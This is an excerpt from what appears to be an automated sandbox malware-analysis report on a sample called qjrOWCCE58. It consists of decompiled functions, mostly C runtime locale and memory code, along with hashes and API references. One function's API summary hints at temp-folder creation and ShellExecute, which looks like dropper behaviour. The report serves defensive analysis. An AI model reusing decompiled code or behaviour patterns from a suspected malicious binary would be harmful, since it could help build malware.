0x00000000
0x00000000
0x00000000
0x00000000
0x0040f26f
0x00000000
0x0040f267
0x0040f2d6
0x0040f2da
0x0040f2da
0x0040f259
0x00000000

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9d9c5f7b6508a30b40e071b4bfbfce6ff5a829c921ae11ee1f64db9a08734926
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4211267F20108243D6748A6DE4B86B7A795EBC532176C43FFD0426BFD8D23BA94D9608

Uniqueness

Uniqueness Score: -1.00%

Function 0082F4A7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c37f212afbdeaa0a69a1679e1ae6aa1f7f93b6271d5653e252638b3f7eca19b1
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B41108B72000718396148E2DF6B45B7A3F5FEC932076D437AD242CB75AD262D9C5D600

Uniqueness

Uniqueness Score: -1.00%

Function 00820D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 81a29c71d434ac710117a70cc817b108fc04298b134188d95a9772f72fe6c02f
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 4B01F7766016148FDF21CF60E804BAA33F5FB85305F1545A4D506D7282E370A8C18F80

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBEF Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041EBEF(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0041CDE2(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x0041ebfc
0x0041ebfe
0x0041ec01
0x0041ec04
0x0041ec07
0x0041ec18
0x0041ec1a
0x0041ec09
0x0041ec0d
0x0041ec16
0x00000000
0x00000000
0x0041ec16
0x0041ec1f

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction ID: bb232978ae19a017b066a568919a30638ad017c6e37cecd15778773c4214253a
Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction Fuzzy Hash: 69E08C32A11228EBCB14DB8AC9449CAF7ECEB44B04B1504ABBA01D3200D274DE81CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0083EE56 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction ID: fdde04b17ececb171f6f36de4dfb3c8048566299b74285595ca52b0ab4ab8b8d
Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction Fuzzy Hash: 82E04672911228EBCB14DB8CD944D8AB3ACFB88B40F1104AAB501E3141C270DE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00827620 Relevance: 24.9, APIs: 5, Strings: 9, Instructions: 381sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00827CD7: __Init_thread_footer.LIBCMT ref: 00827D57

GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00827795
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0082782A
ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00827A9D

Part of subcall function 008232B7: CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0043B054), ref: 00823337
Part of subcall function 008232B7: CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 0082335B
Part of subcall function 008232B7: _mbstowcs.LIBCMT ref: 008233AE
Part of subcall function 008232B7: CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 008233C5
Part of subcall function 008232B7: GetLastError.KERNEL32 ref: 008233CF

SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,00000000), ref: 00827AB2
Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000), ref: 00827C10

Strings

h`{C, xrefs: 00827A49
6, xrefs: 00827B4E
hX{C, xrefs: 0082784B
9, xrefs: 008279A8
jjjj, xrefs: 00827AAA
h\{C, xrefs: 00827931
B, xrefs: 00827AF7
*:, xrefs: 00827968
#, xrefs: 00827699

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Crypt$CreateHashPath$AcquireContextDataDirectoryErrorExecuteFolderInit_thread_footerLastShellSleepTemp_mbstowcs
String ID: #$6$B$hX{C$h\{C$h`{C$jjjj$*:$9
API String ID: 632358973-291428306
Opcode ID: 4d624645cc3d0c944c39d75d2f7d49c60adcfe6d2fa497e5c95c82e26979fce0
Instruction ID: aaedeeefa063a05eda01d71491878eba65d997cec22944b206449c1ef6e27977
Opcode Fuzzy Hash: 4d624645cc3d0c944c39d75d2f7d49c60adcfe6d2fa497e5c95c82e26979fce0
Instruction Fuzzy Hash: 3AE14D71D042689ADB25E768EC9ABED7764BF15304F4001E9E44AE3192EF346F88CA53

Uniqueness

Uniqueness Score: -1.00%

Function 00417810 Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00417810(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x43b054; // 0x41d6575c
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x42e308;
					 *(_t252 + 0x94) = 0x42e588;
					 *(_t252 + 0x98) = 0x42e708;
					 *(_t252 + 4) = 1;
					L48:
					return E0040D3AF(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E0041CA2B(1, 4);
					E0041CA88(_t205);
					_v32 = E0041CA2B(0x180, 2);
					E0041CA88(_t205);
					_t237 = E0041CA2B(0x180, 1);
					_v44 = _t237;
					E0041CA88(_t205);
					_v36 = E0041CA2B(0x180, 1);
					E0041CA88(_t205);
					_v40 = E0041CA2B(0x101, 1);
					E0041CA88(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E0041CA88(_v52);
						E0041CA88(_v32);
						E0041CA88(_t237);
						E0041CA88(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E0041FBBC(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E0041FBBC(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E00420045(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E0041CA88( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E0041CA88( *(_t252 + 0x94) - 0x80);
											E0041CA88( *(_t252 + 0x98) - 0x80);
											E0041CA88( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E0041CA88(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E0040F2F0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E0041FE95(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00417810
0x00417818
0x0041781f
0x00417824
0x00417827
0x0041782a
0x0041782d
0x0041782f
0x00417832
0x00417838
0x0041783b
0x0041783e
0x00417841
0x00417846
0x00417c29
0x00417c2b
0x00417c2d
0x00417c2d
0x00417c30
0x00417c36
0x00417c36
0x00417c38
0x00417c3e
0x00417c44
0x00417c4e
0x00417c58
0x00417c5f
0x00417c6d
0x00417c6d
0x0041784c
0x0041784f
0x00417854
0x00417872
0x0041787c
0x0041787f
0x00417892
0x00417895
0x004178a2
0x004178a5
0x004178a8
0x004178ba
0x004178bd
0x004178cf
0x004178d2
0x004178d7
0x004178dd
0x00417bf2
0x00417bf5
0x00417bfd
0x00417c03
0x00417c0b
0x00417c15
0x00417c15
0x00000000
0x004178ec
0x004178ec
0x004178f1
0x00000000
0x00417908
0x00417908
0x0041790a
0x0041790a
0x0041790d
0x0041790e
0x00417924
0x00000000
0x00000000
0x0041792a
0x00417930
0x00000000
0x00000000
0x00417936
0x00417939
0x0041793f
0x00417995
0x00417998
0x004179a2
0x004179b7
0x004179bb
0x004179c0
0x004179c3
0x004179c5
0x00000000
0x00000000
0x004179ee
0x004179f3
0x004179f6
0x004179f8
0x00000000
0x00000000
0x00417a13
0x00417a19
0x00417a1e
0x00417a23
0x00000000
0x00000000
0x00417a29
0x00417a32
0x00417a38
0x00417a3b
0x00417a3e
0x00417a41
0x00417a44
0x00417a4a
0x00417a4d
0x00417a50
0x00417a53
0x00417a55
0x00417a5b
0x00417a5e
0x00417a60
0x00417b30
0x00417b37
0x00417b38
0x00417b43
0x00417b48
0x00417b52
0x00417b54
0x00417b55
0x00417b57
0x00417b58
0x00417b60
0x00417b60
0x00417b62
0x00417b64
0x00417b65
0x00417b70
0x00417b75
0x00417b79
0x00417b87
0x00417b92
0x00417b9a
0x00417ba8
0x00417bb3
0x00417bb8
0x00417b79
0x00417bbb
0x00417bbe
0x00417bc4
0x00417bcd
0x00417bd2
0x00417bdb
0x00417be4
0x00417bed
0x00417c16
0x00417c19
0x00417c1f
0x00000000
0x00417c1f
0x00417a6d
0x00417ac6
0x00417ac9
0x00417acc
0x00000000
0x00000000
0x00417ace
0x00417ad1
0x00417ad1
0x00417ad4
0x00417ad6
0x00000000
0x00000000
0x00417ad8
0x00417ade
0x00417ae1
0x00417ae3
0x00417b26
0x00417b26
0x00417b29
0x00417b2c
0x00000000
0x00000000
0x00000000
0x00417b2c
0x00417aeb
0x00417af4
0x00417af6
0x00417af6
0x00417af8
0x00417afb
0x00417afe
0x00417b01
0x00417b03
0x00417b08
0x00417b0b
0x00417b0e
0x00417b11
0x00417b13
0x00417b18
0x00417b19
0x00417b19
0x00417b1d
0x00417b20
0x00417b23
0x00000000
0x00417b23
0x00417b2e
0x00417b2e
0x00000000
0x00417b2e
0x00417a76
0x00417a79
0x00417a86
0x00417a88
0x00417a8d
0x00417a90
0x00417a93
0x00417a9b
0x00417a9d
0x00417aab
0x00417aae
0x00417ab1
0x00417ab4
0x00417ab6
0x00417ab9
0x00417abd
0x00000000
0x00417ac4
0x00417941
0x00417948
0x00417962
0x00417965
0x00417968
0x00000000
0x00000000
0x0041796a
0x0041796d
0x0041796d
0x00417970
0x00417972
0x00000000
0x00000000
0x00417974
0x0041797a
0x0041797c
0x0041798b
0x0041798b
0x0041798e
0x00417990
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041797e
0x0041797e
0x0041797e
0x00417982
0x00417987
0x00417987
0x00000000
0x0041797e
0x00417992
0x00000000
0x00417992
0x00417958
0x0041795d
0x00000000
0x0041795d
0x004178f1
0x004178dd
0x00417856
0x00417857
0x0041785c
0x00417860
0x00417861
0x00417862
0x00417867
0x0041786c
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0041787F
_free.LIBCMT ref: 00417895
_free.LIBCMT ref: 004178A8
_free.LIBCMT ref: 004178BD
_free.LIBCMT ref: 004178D2
GetCPInfo.KERNEL32(?,?), ref: 0041791C

Part of subcall function 0041FE95: _free.LIBCMT ref: 0041FF00

_free.LIBCMT ref: 00417B87
_free.LIBCMT ref: 00417B9A
_free.LIBCMT ref: 00417BA8
_free.LIBCMT ref: 00417BB3
_free.LIBCMT ref: 00417BF5
_free.LIBCMT ref: 00417BFD
_free.LIBCMT ref: 00417C03
_free.LIBCMT ref: 00417C0B
_free.LIBCMT ref: 00417C19

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9939cd81f4593e90205f655c90cf4cd7de469e3f27d8e97474ea9956dc099f03
Instruction ID: 48149c489020d9aab9f4667ce827cf48b6df4630439debc6ca2c9f495574bb75
Opcode Fuzzy Hash: 9939cd81f4593e90205f655c90cf4cd7de469e3f27d8e97474ea9956dc099f03
Instruction Fuzzy Hash: 81D18C71D042199FDB11DFB9C881BEEBBB5FF08304F14416EE495A7382DB78A8858B54

Uniqueness

Uniqueness Score: -1.00%

Function 00837A77 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00837AE6
_free.LIBCMT ref: 00837AFC
_free.LIBCMT ref: 00837B0F
_free.LIBCMT ref: 00837B24
_free.LIBCMT ref: 00837B39
GetCPInfo.KERNEL32(?,?), ref: 00837B83

Part of subcall function 008400FC: _free.LIBCMT ref: 00840167

_free.LIBCMT ref: 00837DEE
_free.LIBCMT ref: 00837E01
_free.LIBCMT ref: 00837E0F
_free.LIBCMT ref: 00837E1A
_free.LIBCMT ref: 00837E5C
_free.LIBCMT ref: 00837E64
_free.LIBCMT ref: 00837E6A
_free.LIBCMT ref: 00837E72
_free.LIBCMT ref: 00837E80

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a76cec1aed312bdb8315e5bf8cb409f06ff9af3e36459662cc9f23d0c7fb029b
Instruction ID: 3c5081dee0c0fea9916e50537179f0e7230070ece1aaf2335c7274281ade5f03
Opcode Fuzzy Hash: a76cec1aed312bdb8315e5bf8cb409f06ff9af3e36459662cc9f23d0c7fb029b
Instruction Fuzzy Hash: 9BD19CB19042499FDB21DFB8C881BEEBBF5FF89710F144069E499E7282D774A845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00424B56 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00424B56(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x43b160) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0041CA88(_t46);
							E00423E02( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0041CA88(_t47);
							E004242B6( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0041CA88( *((intOrPtr*)(_t74 + 0x7c)));
						E0041CA88( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0041CA88( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0041CA88( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0041CA88( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0041CA88( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00424CC7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x43b290) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0041CA88(_t31);
							E0041CA88( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0041CA88(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0041CA88(_t74);
			}

0x00424b5e
0x00424b62
0x00424b6a
0x00424b73
0x00424b78
0x00424b7f
0x00424b87
0x00424b8f
0x00424b9a
0x00424ba0
0x00424ba1
0x00424ba9
0x00424bb1
0x00424bbc
0x00424bc2
0x00424bc6
0x00424bd1
0x00424bd7
0x00424b78
0x00424bd8
0x00424be0
0x00424bf3
0x00424c06
0x00424c14
0x00424c1f
0x00424c24
0x00424c2d
0x00424c35
0x00424c36
0x00424c3c
0x00424c3f
0x00424c42
0x00424c49
0x00424c4b
0x00424c4f
0x00424c57
0x00424c5e
0x00424c64
0x00424c65
0x00424c65
0x00424c6c
0x00424c6e
0x00424c73
0x00424c7b
0x00424c80
0x00424c81
0x00424c81
0x00424c84
0x00424c87
0x00424c8a
0x00424c8d
0x00424c8d
0x00424c9d

APIs

___free_lconv_mon.LIBCMT ref: 00424B9A

Part of subcall function 00423E02: _free.LIBCMT ref: 00423E1F
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E31
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E43
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E55
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E67
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E79
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E8B
Part of subcall function 00423E02: _free.LIBCMT ref: 00423E9D
Part of subcall function 00423E02: _free.LIBCMT ref: 00423EAF
Part of subcall function 00423E02: _free.LIBCMT ref: 00423EC1
Part of subcall function 00423E02: _free.LIBCMT ref: 00423ED3
Part of subcall function 00423E02: _free.LIBCMT ref: 00423EE5
Part of subcall function 00423E02: _free.LIBCMT ref: 00423EF7

_free.LIBCMT ref: 00424B8F

Part of subcall function 0041CA88: HeapFree.KERNEL32(00000000,00000000,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?), ref: 0041CA9E
Part of subcall function 0041CA88: GetLastError.KERNEL32(?,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?,?), ref: 0041CAB0

_free.LIBCMT ref: 00424BB1
_free.LIBCMT ref: 00424BC6
_free.LIBCMT ref: 00424BD1
_free.LIBCMT ref: 00424BF3
_free.LIBCMT ref: 00424C06
_free.LIBCMT ref: 00424C14
_free.LIBCMT ref: 00424C1F
_free.LIBCMT ref: 00424C57
_free.LIBCMT ref: 00424C5E
_free.LIBCMT ref: 00424C7B
_free.LIBCMT ref: 00424C93

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a54f2e84de93964c1f66c2c1bb6945bc6d2d930b71f9b497bf0cc54d3a9d4edb
Instruction ID: 9487ccfec48dbd833a6b144705161dad6b67b53abf77f47b0f86321675db5026
Opcode Fuzzy Hash: a54f2e84de93964c1f66c2c1bb6945bc6d2d930b71f9b497bf0cc54d3a9d4edb
Instruction Fuzzy Hash: B8317F31A403199FEB22EA3AF885B9B77E8EF90356F91451BE054D7251DF78EC808718

Uniqueness

Uniqueness Score: -1.00%

Function 00844DBD Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00844E01

Part of subcall function 00844069: _free.LIBCMT ref: 00844086
Part of subcall function 00844069: _free.LIBCMT ref: 00844098
Part of subcall function 00844069: _free.LIBCMT ref: 008440AA
Part of subcall function 00844069: _free.LIBCMT ref: 008440BC
Part of subcall function 00844069: _free.LIBCMT ref: 008440CE
Part of subcall function 00844069: _free.LIBCMT ref: 008440E0
Part of subcall function 00844069: _free.LIBCMT ref: 008440F2
Part of subcall function 00844069: _free.LIBCMT ref: 00844104
Part of subcall function 00844069: _free.LIBCMT ref: 00844116
